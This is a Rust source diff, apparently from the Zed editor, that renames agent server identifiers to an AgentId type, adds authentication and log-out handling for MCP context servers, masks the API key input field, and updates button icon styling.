+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
settings::CustomAgentServerSettings::Custom { default_model, .. }
@@ -178,7 +183,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.cloned()
});
@@ -200,13 +205,13 @@ impl AgentServer for CustomAgentServer {
fs: Arc<dyn Fs>,
cx: &App,
) {
- let name = self.name();
+ let agent_id = self.agent_id();
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
let favorite_models = match settings {
settings::CustomAgentServerSettings::Custom {
@@ -235,7 +240,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.cloned()
});
@@ -251,15 +256,15 @@ impl AgentServer for CustomAgentServer {
fs: Arc<dyn Fs>,
cx: &mut App,
) {
- let name = self.name();
+ let agent_id = self.agent_id();
let config_id = config_id.to_string();
let value_id = value_id.map(|s| s.to_string());
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
settings::CustomAgentServerSettings::Custom {
@@ -287,21 +292,17 @@ impl AgentServer for CustomAgentServer {
fn connect(
&self,
delegate: AgentServerDelegate,
+ project: Entity<Project>,
cx: &mut App,
) -> Task<Result<Rc<dyn AgentConnection>>> {
- let name = self.name();
- let display_name = delegate
- .store
- .read(cx)
- .agent_display_name(&ExternalAgentServerName(name.clone()))
- .unwrap_or_else(|| name.clone());
+ let agent_id = self.agent_id();
let default_mode = self.default_mode(cx);
let default_model = self.default_model(cx);
- let is_registry_agent = is_registry_agent(&name, cx);
+ let is_registry_agent = is_registry_agent(agent_id.clone(), cx);
let default_config_options = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.map(|s| match s {
project::agent_server_store::CustomAgentServerSettings::Custom {
default_config_options,
@@ -330,11 +331,11 @@ impl AgentServer for CustomAgentServer {
extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned());
}
if is_registry_agent {
- match name.as_ref() {
- CLAUDE_AGENT_NAME => {
+ match agent_id.as_ref() {
+ CLAUDE_AGENT_ID => {
extra_env.insert("ANTHROPIC_API_KEY".into(), "".into());
}
- CODEX_NAME => {
+ CODEX_ID => {
if let Ok(api_key) = std::env::var("CODEX_API_KEY") {
extra_env.insert("CODEX_API_KEY".into(), api_key);
}
@@ -342,7 +343,7 @@ impl AgentServer for CustomAgentServer {
extra_env.insert("OPEN_AI_API_KEY".into(), api_key);
}
}
- GEMINI_NAME => {
+ GEMINI_ID => {
extra_env.insert("SURFACE".to_owned(), "zed".to_owned());
}
_ => {}
@@ -350,29 +351,26 @@ impl AgentServer for CustomAgentServer {
}
let store = delegate.store.downgrade();
cx.spawn(async move |cx| {
- if is_registry_agent && name.as_ref() == GEMINI_NAME {
+ if is_registry_agent && agent_id.as_ref() == GEMINI_ID {
if let Some(api_key) = cx.update(api_key_for_gemini_cli).await.ok() {
extra_env.insert("GEMINI_API_KEY".into(), api_key);
}
}
let command = store
.update(cx, |store, cx| {
- let agent = store
- .get_external_agent(&ExternalAgentServerName(name.clone()))
- .with_context(|| {
- format!("Custom agent server `{}` is not registered", name)
- })?;
+ let agent = store.get_external_agent(&agent_id).with_context(|| {
+ format!("Custom agent server `{}` is not registered", agent_id)
+ })?;
anyhow::Ok(agent.get_command(
extra_env,
- delegate.status_tx,
delegate.new_version_available,
&mut cx.to_async(),
))
})??
.await?;
let connection = crate::acp::connect(
- name,
- display_name,
+ agent_id,
+ project,
command,
default_mode,
default_model,
@@ -406,15 +404,15 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task<Result<String>> {
})
}
-fn is_registry_agent(name: &str, cx: &App) -> bool {
- let is_previous_built_in = matches!(name, CLAUDE_AGENT_NAME | CODEX_NAME | GEMINI_NAME);
+fn is_registry_agent(agent_id: impl Into<AgentId>, cx: &App) -> bool {
+ let agent_id = agent_id.into();
let is_in_registry = project::AgentRegistryStore::try_global(cx)
- .map(|store| store.read(cx).agent(name).is_some())
+ .map(|store| store.read(cx).agent(&agent_id).is_some())
.unwrap_or(false);
let is_settings_registry = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(name)
+ .get(agent_id.as_ref())
.is_some_and(|s| {
matches!(
s,
@@ -422,11 +420,14 @@ fn is_registry_agent(name: &str, cx: &App) -> bool {
)
})
});
- is_previous_built_in || is_in_registry || is_settings_registry
+ is_in_registry || is_settings_registry
}
-fn default_settings_for_agent(name: &str, cx: &App) -> settings::CustomAgentServerSettings {
- if is_registry_agent(name, cx) {
+fn default_settings_for_agent(
+ agent_id: impl Into<AgentId>,
+ cx: &App,
+) -> settings::CustomAgentServerSettings {
+ if is_registry_agent(agent_id, cx) {
settings::CustomAgentServerSettings::Registry {
default_model: None,
default_mode: None,
@@ -456,6 +457,7 @@ mod tests {
AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent,
};
use settings::Settings as _;
+ use ui::SharedString;
fn init_test(cx: &mut TestAppContext) {
cx.update(|cx| {
@@ -471,11 +473,12 @@ mod tests {
let id = SharedString::from(id.to_string());
RegistryAgent::Npx(RegistryNpxAgent {
metadata: RegistryAgentMetadata {
- id: id.clone(),
+ id: AgentId::new(id.clone()),
name: id.clone(),
description: SharedString::from(""),
version: SharedString::from("1.0.0"),
repository: None,
+ website: None,
icon_path: None,
},
package: id,
@@ -506,16 +509,6 @@ mod tests {
});
}
- #[gpui::test]
- fn test_previous_builtins_are_registry(cx: &mut TestAppContext) {
- init_test(cx);
- cx.update(|cx| {
- assert!(is_registry_agent(CLAUDE_AGENT_NAME, cx));
- assert!(is_registry_agent(CODEX_NAME, cx));
- assert!(is_registry_agent(GEMINI_NAME, cx));
- });
- }
-
#[gpui::test]
fn test_unknown_agent_is_not_registry(cx: &mut TestAppContext) {
init_test(cx);
@@ -578,25 +571,6 @@ mod tests {
});
}
- #[gpui::test]
- fn test_default_settings_for_builtin_agent(cx: &mut TestAppContext) {
- init_test(cx);
- cx.update(|cx| {
- assert!(matches!(
- default_settings_for_agent(CODEX_NAME, cx),
- settings::CustomAgentServerSettings::Registry { .. }
- ));
- assert!(matches!(
- default_settings_for_agent(CLAUDE_AGENT_NAME, cx),
- settings::CustomAgentServerSettings::Registry { .. }
- ));
- assert!(matches!(
- default_settings_for_agent(GEMINI_NAME, cx),
- settings::CustomAgentServerSettings::Registry { .. }
- ));
- });
- }
-
#[gpui::test]
fn test_default_settings_for_extension_agent(cx: &mut TestAppContext) {
init_test(cx);
@@ -14,6 +14,7 @@ use std::{
time::Duration,
};
use util::path;
+use util::path_list::PathList;
pub async fn test_basic<T, F>(server: F, cx: &mut TestAppContext)
where
@@ -207,8 +208,10 @@ pub async fn test_tool_call_with_permission<T, F>(
thread.update(cx, |thread, cx| {
thread.authorize_tool_call(
tool_call_id,
- allow_option_id,
- acp::PermissionOptionKind::AllowOnce,
+ acp_thread::SelectedPermissionOutcome::new(
+ allow_option_id,
+ acp::PermissionOptionKind::AllowOnce,
+ ),
cx,
);
@@ -431,13 +434,18 @@ pub async fn new_test_thread(
cx: &mut TestAppContext,
) -> Entity<AcpThread> {
let store = project.read_with(cx, |project, _| project.agent_server_store().clone());
- let delegate = AgentServerDelegate::new(store, project.clone(), None, None);
+ let delegate = AgentServerDelegate::new(store, None);
- let connection = cx.update(|cx| server.connect(delegate, cx)).await.unwrap();
-
- cx.update(|cx| connection.new_session(project.clone(), current_dir.as_ref(), cx))
+ let connection = cx
+ .update(|cx| server.connect(delegate, project.clone(), cx))
.await
- .unwrap()
+ .unwrap();
+
+ cx.update(|cx| {
+ connection.new_session(project.clone(), PathList::new(&[current_dir.as_ref()]), cx)
+ })
+ .await
+ .unwrap()
}
pub async fn run_until_first_tool_call(
@@ -12,7 +12,7 @@ use schemars::JsonSchema;
use serde::{Deserialize, Serialize};
use settings::{
DefaultAgentView, DockPosition, LanguageModelParameters, LanguageModelSelection,
- NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode,
+ NewThreadLocation, NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode,
};
pub use crate::agent_profile::*;
@@ -51,6 +51,7 @@ pub struct AgentSettings {
pub message_editor_min_lines: usize,
pub show_turn_stats: bool,
pub tool_permissions: ToolPermissions,
+ pub new_thread_location: NewThreadLocation,
}
impl AgentSettings {
@@ -438,6 +439,7 @@ impl Settings for AgentSettings {
message_editor_min_lines: agent.message_editor_min_lines.unwrap(),
show_turn_stats: agent.show_turn_stats.unwrap(),
tool_permissions: compile_tool_permissions(agent.tool_permissions),
+ new_thread_location: agent.new_thread_location.unwrap_or_default(),
}
}
}
@@ -34,7 +34,7 @@ agent_servers.workspace = true
agent_settings.workspace = true
ai_onboarding.workspace = true
anyhow.workspace = true
-arrayvec.workspace = true
+heapless.workspace = true
assistant_text_thread.workspace = true
assistant_slash_command.workspace = true
assistant_slash_commands.workspace = true
@@ -28,7 +28,7 @@ use language_model::{
use language_models::AllLanguageModelSettings;
use notifications::status_toast::{StatusToast, ToastIcon};
use project::{
- agent_server_store::{AgentServerStore, ExternalAgentServerName, ExternalAgentSource},
+ agent_server_store::{AgentId, AgentServerStore, ExternalAgentSource},
context_server_store::{ContextServerConfiguration, ContextServerStatus, ContextServerStore},
};
use settings::{Settings, SettingsStore, update_settings_file};
@@ -228,6 +228,7 @@ impl AgentConfiguration {
.unwrap_or(false);
v_flex()
+ .min_w_0()
.w_full()
.when(is_expanded, |this| this.mb_2())
.child(
@@ -312,6 +313,7 @@ impl AgentConfiguration {
)
.child(
v_flex()
+ .min_w_0()
.w_full()
.px_2()
.gap_1()
@@ -330,10 +332,11 @@ impl AgentConfiguration {
.full_width()
.style(ButtonStyle::Outlined)
.layer(ElevationIndex::ModalSurface)
- .icon_position(IconPosition::Start)
- .icon(IconName::Thread)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Thread)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.on_click(cx.listener({
let provider = provider.clone();
@@ -355,10 +358,11 @@ impl AgentConfiguration {
)
.full_width()
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Trash)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Trash)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.on_click(cx.listener({
let provider = provider.clone();
@@ -424,10 +428,11 @@ impl AgentConfiguration {
.trigger(
Button::new("add-provider", "Add Provider")
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small),
)
.menu({
@@ -459,6 +464,7 @@ impl AgentConfiguration {
});
v_flex()
+ .min_w_0()
.w_full()
.child(self.render_section_title(
"LLM Providers",
@@ -498,6 +504,7 @@ impl AgentConfiguration {
Plan::ZedFree => ("Free", Color::Default, free_chip_bg),
Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg),
Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg),
+ Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg),
Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg),
};
@@ -510,21 +517,18 @@ impl AgentConfiguration {
}
}
- fn render_context_servers_section(
- &mut self,
- window: &mut Window,
- cx: &mut Context<Self>,
- ) -> impl IntoElement {
+ fn render_context_servers_section(&mut self, cx: &mut Context<Self>) -> impl IntoElement {
let context_server_ids = self.context_server_store.read(cx).server_ids();
let add_server_popover = PopoverMenu::new("add-server-popover")
.trigger(
Button::new("add-server", "Add Server")
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small),
)
.menu({
@@ -559,6 +563,7 @@ impl AgentConfiguration {
});
v_flex()
+ .min_w_0()
.border_b_1()
.border_color(cx.theme().colors().border)
.child(self.render_section_title(
@@ -592,7 +597,7 @@ impl AgentConfiguration {
} else {
parent.children(itertools::intersperse_with(
context_server_ids.iter().cloned().map(|context_server_id| {
- self.render_context_server(context_server_id, window, cx)
+ self.render_context_server(context_server_id, cx)
.into_any_element()
}),
|| {
@@ -609,7 +614,6 @@ impl AgentConfiguration {
fn render_context_server(
&self,
context_server_id: ContextServerId,
- window: &mut Window,
cx: &Context<Self>,
) -> impl use<> + IntoElement {
let server_status = self
@@ -637,6 +641,9 @@ impl AgentConfiguration {
} else {
None
};
+ let auth_required = matches!(server_status, ContextServerStatus::AuthRequired);
+ let authenticating = matches!(server_status, ContextServerStatus::Authenticating);
+ let context_server_store = self.context_server_store.clone();
let tool_count = self
.context_server_registry
@@ -680,11 +687,33 @@ impl AgentConfiguration {
Indicator::dot().color(Color::Muted).into_any_element(),
"Server is stopped.",
),
+ ContextServerStatus::AuthRequired => (
+ Indicator::dot().color(Color::Warning).into_any_element(),
+ "Authentication required.",
+ ),
+ ContextServerStatus::Authenticating => (
+ Icon::new(IconName::LoadCircle)
+ .size(IconSize::XSmall)
+ .color(Color::Accent)
+ .with_keyed_rotate_animation(
+ SharedString::from(format!("{}-authenticating", context_server_id.0)),
+ 3,
+ )
+ .into_any_element(),
+ "Waiting for authorization...",
+ ),
};
+
let is_remote = server_configuration
.as_ref()
.map(|config| matches!(config.as_ref(), ContextServerConfiguration::Http { .. }))
.unwrap_or(false);
+
+ let should_show_logout_button = server_configuration.as_ref().is_some_and(|config| {
+ matches!(config.as_ref(), ContextServerConfiguration::Http { .. })
+ && !config.has_static_auth_header()
+ });
+
let context_server_configuration_menu = PopoverMenu::new("context-server-config-menu")
.trigger_with_tooltip(
IconButton::new("context-server-config-menu", IconName::Settings)
@@ -699,6 +728,7 @@ impl AgentConfiguration {
let language_registry = self.language_registry.clone();
let workspace = self.workspace.clone();
let context_server_registry = self.context_server_registry.clone();
+ let context_server_store = context_server_store.clone();
move |window, cx| {
Some(ContextMenu::build(window, cx, |menu, _window, _cx| {
@@ -745,6 +775,17 @@ impl AgentConfiguration {
.ok();
}
}))
+ .when(should_show_logout_button, |this| {
+ this.entry("Log Out", None, {
+ let context_server_store = context_server_store.clone();
+ let context_server_id = context_server_id.clone();
+ move |_window, cx| {
+ context_server_store.update(cx, |store, cx| {
+ store.logout_server(&context_server_id, cx).log_err();
+ });
+ }
+ })
+ })
.separator()
.entry("Uninstall", None, {
let fs = fs.clone();
@@ -801,10 +842,16 @@ impl AgentConfiguration {
}
});
+ let feedback_base_container =
+ || h_flex().py_1().min_w_0().w_full().gap_1().justify_between();
+
v_flex()
+ .min_w_0()
.id(item_id.clone())
.child(
h_flex()
+ .min_w_0()
+ .w_full()
.justify_between()
.child(
h_flex()
@@ -820,13 +867,13 @@ impl AgentConfiguration {
.tooltip(Tooltip::text(tooltip_text))
.child(status_indicator),
)
- .child(Label::new(item_id).truncate())
+ .child(Label::new(item_id).flex_shrink_0().truncate())
.child(
div()
.id("extension-source")
+ .min_w_0()
.mt_0p5()
.mx_1()
- .flex_none()
.tooltip(Tooltip::text(source_tooltip))
.child(
Icon::new(source_icon)
@@ -856,6 +903,7 @@ impl AgentConfiguration {
.on_click({
let context_server_manager = self.context_server_store.clone();
let fs = self.fs.clone();
+ let context_server_id = context_server_id.clone();
move |state, _window, cx| {
let is_enabled = match state {
@@ -903,32 +951,113 @@ impl AgentConfiguration {
)
.map(|parent| {
if let Some(error) = error {
+ return parent
+ .child(
+ feedback_base_container()
+ .child(
+ h_flex()
+ .pr_4()
+ .min_w_0()
+ .w_full()
+ .gap_2()
+ .child(
+ Icon::new(IconName::XCircle)
+ .size(IconSize::XSmall)
+ .color(Color::Error),
+ )
+ .child(
+ div().min_w_0().flex_1().child(
+ Label::new(error)
+ .color(Color::Muted)
+ .size(LabelSize::Small),
+ ),
+ ),
+ )
+ .when(should_show_logout_button, |this| {
+ this.child(
+ Button::new("error-logout-server", "Log Out")
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click({
+ let context_server_store =
+ context_server_store.clone();
+ let context_server_id =
+ context_server_id.clone();
+ move |_event, _window, cx| {
+ context_server_store.update(
+ cx,
+ |store, cx| {
+ store
+ .logout_server(
+ &context_server_id,
+ cx,
+ )
+ .log_err();
+ },
+ );
+ }
+ }),
+ )
+ }),
+ );
+ }
+ if auth_required {
return parent.child(
- h_flex()
- .gap_2()
- .pr_4()
- .items_start()
+ feedback_base_container()
.child(
h_flex()
- .flex_none()
- .h(window.line_height() / 1.6_f32)
- .justify_center()
+ .pr_4()
+ .min_w_0()
+ .w_full()
+ .gap_2()
.child(
- Icon::new(IconName::XCircle)
+ Icon::new(IconName::Info)
.size(IconSize::XSmall)
- .color(Color::Error),
+ .color(Color::Muted),
+ )
+ .child(
+ Label::new("Authenticate to connect this server")
+ .color(Color::Muted)
+ .size(LabelSize::Small),
),
)
.child(
- div().w_full().child(
- Label::new(error)
- .buffer_font(cx)
- .color(Color::Muted)
- .size(LabelSize::Small),
- ),
+ Button::new("error-logout-server", "Authenticate")
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click({
+ let context_server_store = context_server_store.clone();
+ let context_server_id = context_server_id.clone();
+ move |_event, _window, cx| {
+ context_server_store.update(cx, |store, cx| {
+ store
+ .authenticate_server(&context_server_id, cx)
+ .log_err();
+ });
+ }
+ }),
),
);
}
+ if authenticating {
+ return parent.child(
+ h_flex()
+ .mt_1()
+ .pr_4()
+ .min_w_0()
+ .w_full()
+ .gap_2()
+ .child(
+ div().size_3().flex_shrink_0(), // Alignment Div
+ )
+ .child(
+ Label::new("Authenticating…")
+ .color(Color::Muted)
+ .size(LabelSize::Small),
+ ),
+
+ );
+ }
parent
})
}
@@ -962,10 +1091,11 @@ impl AgentConfiguration {
.trigger(
Button::new("add-agent", "Add Agent")
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small),
)
.menu({
@@ -1019,6 +1149,7 @@ impl AgentConfiguration {
});
v_flex()
+ .min_w_0()
.border_b_1()
.border_color(cx.theme().colors().border)
.child(
@@ -1089,7 +1220,7 @@ impl AgentConfiguration {
ExternalAgentSource::Custom => None,
};
- let agent_server_name = ExternalAgentServerName(id.clone());
+ let agent_server_name = AgentId(id.clone());
let uninstall_button = match source {
ExternalAgentSource::Extension => Some(
@@ -1217,9 +1348,10 @@ impl Render for AgentConfiguration {
.id("assistant-configuration-content")
.track_scroll(&self.scroll_handle)
.size_full()
+ .min_w_0()
.overflow_y_scroll()
.child(self.render_agent_servers_section(cx))
- .child(self.render_context_servers_section(window, cx))
+ .child(self.render_context_servers_section(cx))
.child(self.render_provider_configuration_section(cx)),
)
.vertical_scrollbar_for(&self.scroll_handle, window, cx),
@@ -68,14 +68,17 @@ impl AddLlmProviderInput {
let provider_name =
single_line_input("Provider Name", provider.name(), None, 1, window, cx);
let api_url = single_line_input("API URL", provider.api_url(), None, 2, window, cx);
- let api_key = single_line_input(
- "API Key",
- "000000000000000000000000000000000000000000000000",
- None,
- 3,
- window,
- cx,
- );
+ let api_key = cx.new(|cx| {
+ InputField::new(
+ window,
+ cx,
+ "000000000000000000000000000000000000000000000000",
+ )
+ .label("API Key")
+ .tab_index(3)
+ .tab_stop(true)
+ .masked(true)
+ });
Self {
provider_name,
@@ -340,10 +343,11 @@ impl AddLlmProviderModal {
.child(Label::new("Models").size(LabelSize::Small))
.child(
Button::new("add-model", "Add Model")
- .icon(IconName::Plus)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.on_click(cx.listener(|this, _, window, cx| {
this.input.add_model(window, cx);
@@ -446,10 +450,11 @@ impl AddLlmProviderModal {
.when(has_more_than_one_model, |this| {
this.child(
Button::new(("remove-model", ix), "Remove Model")
- .icon(IconName::Trash)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Trash)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.style(ButtonStyle::Outlined)
.full_width()
@@ -1,25 +1,27 @@
-use std::sync::{Arc, Mutex};
-
use anyhow::{Context as _, Result};
use collections::HashMap;
use context_server::{ContextServerCommand, ContextServerId};
use editor::{Editor, EditorElement, EditorStyle};
+
use gpui::{
AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle,
- Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*,
+ Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*,
};
use language::{Language, LanguageRegistry};
use markdown::{Markdown, MarkdownElement, MarkdownStyle};
use notifications::status_toast::{StatusToast, ToastIcon};
+use parking_lot::Mutex;
use project::{
context_server_store::{
- ContextServerStatus, ContextServerStore, registry::ContextServerDescriptorRegistry,
+ ContextServerStatus, ContextServerStore, ServerStatusChangedEvent,
+ registry::ContextServerDescriptorRegistry,
},
project_settings::{ContextServerSettings, ProjectSettings},
worktree_store::WorktreeStore,
};
use serde::Deserialize;
use settings::{Settings as _, update_settings_file};
+use std::sync::Arc;
use theme::ThemeSettings;
use ui::{
CommonAnimationExt, KeyBinding, Modal, ModalFooter, ModalHeader, Section, Tooltip,
@@ -237,6 +239,8 @@ fn context_server_input(existing: Option<(ContextServerId, ContextServerCommand)
format!(
r#"{{
+ /// Configure an MCP server that runs locally via stdin/stdout
+ ///
/// The name of your MCP server
"{name}": {{
/// The command which runs the MCP server
@@ -280,6 +284,8 @@ fn context_server_http_input(
format!(
r#"{{
+ /// Configure an MCP server that you connect to over HTTP
+ ///
/// The name of your remote MCP server
"{name}": {{
/// The URL of the remote MCP server
@@ -342,6 +348,8 @@ fn resolve_context_server_extension(
enum State {
Idle,
Waiting,
+ AuthRequired { server_id: ContextServerId },
+ Authenticating { _server_id: ContextServerId },
Error(SharedString),
}
@@ -352,6 +360,7 @@ pub struct ConfigureContextServerModal {
state: State,
original_server_id: Option<ContextServerId>,
scroll_handle: ScrollHandle,
+ _auth_subscription: Option<Subscription>,
}
impl ConfigureContextServerModal {
@@ -475,6 +484,7 @@ impl ConfigureContextServerModal {
cx,
),
scroll_handle: ScrollHandle::new(),
+ _auth_subscription: None,
})
})
})
@@ -486,6 +496,13 @@ impl ConfigureContextServerModal {
}
fn confirm(&mut self, _: &menu::Confirm, cx: &mut Context<Self>) {
+ if matches!(
+ self.state,
+ State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. }
+ ) {
+ return;
+ }
+
self.state = State::Idle;
let Some(workspace) = self.workspace.upgrade() else {
return;
@@ -515,14 +532,19 @@ impl ConfigureContextServerModal {
async move |this, cx| {
let result = wait_for_context_server_task.await;
this.update(cx, |this, cx| match result {
- Ok(_) => {
+ Ok(ContextServerStatus::Running) => {
this.state = State::Idle;
this.show_configured_context_server_toast(id, cx);
cx.emit(DismissEvent);
}
+ Ok(ContextServerStatus::AuthRequired) => {
+ this.state = State::AuthRequired { server_id: id };
+ cx.notify();
+ }
Err(err) => {
this.set_error(err, cx);
}
+ Ok(_) => {}
})
}
})
@@ -558,6 +580,49 @@ impl ConfigureContextServerModal {
cx.emit(DismissEvent);
}
+ fn authenticate(&mut self, server_id: ContextServerId, cx: &mut Context<Self>) {
+ self.context_server_store.update(cx, |store, cx| {
+ store.authenticate_server(&server_id, cx).log_err();
+ });
+
+ self.state = State::Authenticating {
+ _server_id: server_id.clone(),
+ };
+
+ self._auth_subscription = Some(cx.subscribe(
+ &self.context_server_store,
+ move |this, _, event: &ServerStatusChangedEvent, cx| {
+ if event.server_id != server_id {
+ return;
+ }
+ match &event.status {
+ ContextServerStatus::Running => {
+ this._auth_subscription = None;
+ this.state = State::Idle;
+ this.show_configured_context_server_toast(event.server_id.clone(), cx);
+ cx.emit(DismissEvent);
+ }
+ ContextServerStatus::AuthRequired => {
+ this._auth_subscription = None;
+ this.state = State::AuthRequired {
+ server_id: event.server_id.clone(),
+ };
+ cx.notify();
+ }
+ ContextServerStatus::Error(error) => {
+ this._auth_subscription = None;
+ this.set_error(error.clone(), cx);
+ }
+ ContextServerStatus::Authenticating
+ | ContextServerStatus::Starting
+ | ContextServerStatus::Stopped => {}
+ }
+ },
+ ));
+
+ cx.notify();
+ }
+
fn show_configured_context_server_toast(&self, id: ContextServerId, cx: &mut App) {
self.workspace
.update(cx, {
@@ -615,7 +680,8 @@ impl ConfigureContextServerModal {
}
fn render_modal_description(&self, window: &mut Window, cx: &mut Context<Self>) -> AnyElement {
- const MODAL_DESCRIPTION: &str = "Visit the MCP server configuration docs to find all necessary arguments and environment variables.";
+ const MODAL_DESCRIPTION: &str =
+ "Check the server docs for required arguments and environment variables.";
if let ConfigurationSource::Extension {
installation_instructions: Some(installation_instructions),
@@ -637,6 +703,67 @@ impl ConfigureContextServerModal {
}
}
+ fn render_tab_bar(&self, cx: &mut Context<Self>) -> Option<AnyElement> {
+ let is_http = match &self.source {
+ ConfigurationSource::New { is_http, .. } => *is_http,
+ _ => return None,
+ };
+
+ let tab = |label: &'static str, active: bool| {
+ div()
+ .id(label)
+ .cursor_pointer()
+ .p_1()
+ .text_sm()
+ .border_b_1()
+ .when(active, |this| {
+ this.border_color(cx.theme().colors().border_focused)
+ })
+ .when(!active, |this| {
+ this.border_color(gpui::transparent_black())
+ .text_color(cx.theme().colors().text_muted)
+ .hover(|s| s.text_color(cx.theme().colors().text))
+ })
+ .child(label)
+ };
+
+ Some(
+ h_flex()
+ .pt_1()
+ .mb_2p5()
+ .gap_1()
+ .border_b_1()
+ .border_color(cx.theme().colors().border.opacity(0.5))
+ .child(
+ tab("Local", !is_http).on_click(cx.listener(|this, _, window, cx| {
+ if let ConfigurationSource::New { editor, is_http } = &mut this.source {
+ if *is_http {
+ *is_http = false;
+ let new_text = context_server_input(None);
+ editor.update(cx, |editor, cx| {
+ editor.set_text(new_text, window, cx);
+ });
+ }
+ }
+ })),
+ )
+ .child(
+ tab("Remote", is_http).on_click(cx.listener(|this, _, window, cx| {
+ if let ConfigurationSource::New { editor, is_http } = &mut this.source {
+ if !*is_http {
+ *is_http = true;
+ let new_text = context_server_http_input(None);
+ editor.update(cx, |editor, cx| {
+ editor.set_text(new_text, window, cx);
+ });
+ }
+ }
+ })),
+ )
+ .into_any_element(),
+ )
+ }
+
fn render_modal_content(&self, cx: &App) -> AnyElement {
let editor = match &self.source {
ConfigurationSource::New { editor, .. } => editor,
@@ -682,7 +809,10 @@ impl ConfigureContextServerModal {
fn render_modal_footer(&self, cx: &mut Context<Self>) -> ModalFooter {
let focus_handle = self.focus_handle(cx);
- let is_connecting = matches!(self.state, State::Waiting);
+ let is_busy = matches!(
+ self.state,
+ State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. }
+ );
ModalFooter::new()
.start_slot::<Button>(
@@ -693,9 +823,11 @@ impl ConfigureContextServerModal {
{
Some(
Button::new("open-repository", "Open Repository")
- .icon(IconName::ArrowUpRight)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.tooltip({
let repository_url = repository_url.clone();
move |_window, cx| {
@@ -712,36 +844,6 @@ impl ConfigureContextServerModal {
move |_, _, cx| cx.open_url(&repository_url)
}),
)
- } else if let ConfigurationSource::New { is_http, .. } = &self.source {
- let label = if *is_http {
- "Configure Local"
- } else {
- "Configure Remote"
- };
- let tooltip = if *is_http {
- "Configure an MCP server that runs on stdin/stdout."
- } else {
- "Configure an MCP server that you connect to over HTTP"
- };
-
- Some(
- Button::new("toggle-kind", label)
- .tooltip(Tooltip::text(tooltip))
- .on_click(cx.listener(|this, _, window, cx| match &mut this.source {
- ConfigurationSource::New { editor, is_http } => {
- *is_http = !*is_http;
- let new_text = if *is_http {
- context_server_http_input(None)
- } else {
- context_server_input(None)
- };
- editor.update(cx, |editor, cx| {
- editor.set_text(new_text, window, cx);
- })
- }
- _ => {}
- })),
- )
} else {
None
},
@@ -775,7 +877,7 @@ impl ConfigureContextServerModal {
"Configure Server"
},
)
- .disabled(is_connecting)
+ .disabled(is_busy)
.key_binding(
KeyBinding::for_action_in(&menu::Confirm, &focus_handle, cx)
